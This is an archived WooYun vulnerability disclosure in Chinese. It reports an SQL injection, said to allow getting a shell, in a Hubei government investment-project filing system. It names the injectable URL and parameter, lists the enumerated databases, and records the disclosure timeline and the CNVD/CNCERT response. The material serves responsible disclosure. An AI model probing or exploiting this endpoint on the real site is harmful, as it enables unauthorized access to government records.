[公开漏洞]湖北企业投资项目备案系统SQL注入可getshell
-
来源:WooYun 浏览:629次 时间:2014-07-05
2014-05-20:细节已通知厂商并且等待厂商处理中
2014-05-25:厂商已经确认,细节仅向厂商公开
2014-06-04:细节向核心白帽子及相关领域专家公开
2014-06-14:细节向普通白帽子公开
2014-06-24:细节向实习白帽子公开
2014-07-04:细节向公众公开
湖北企业投资项目备案系统SQL注入可getshell
详细说明:湖北企业投资项目备案系统SQL注入可getshell,包括湖北省企业投资的备案信息,影响较严重,不法分子可通过此漏洞获取到项目备案信息。
http://www.hbinvest.gov.cn/prws/index2.aspx?area_code=420600&str= area_code=420600 存在sql注入漏洞
available databases [12]:
[*] master
[*] model
[*] msdb
[*] Northwind
[*] PRS_Common
[*] prws
[*] pubs
[*] RightDB
[*] RPL
[*] tempdb
[*] test
[*] WorkFlow
修复方案:
过滤
版权声明:转载请注明来源 爱上襄阳@乌云 漏洞回应 厂商回应:危害等级:高
漏洞Rank:10
确认时间:2014-05-25 13:53
厂商回复:CNVD确认并复现所述情况,转由CNCERT下发湖北分中心通报处置。
最新状态:暂无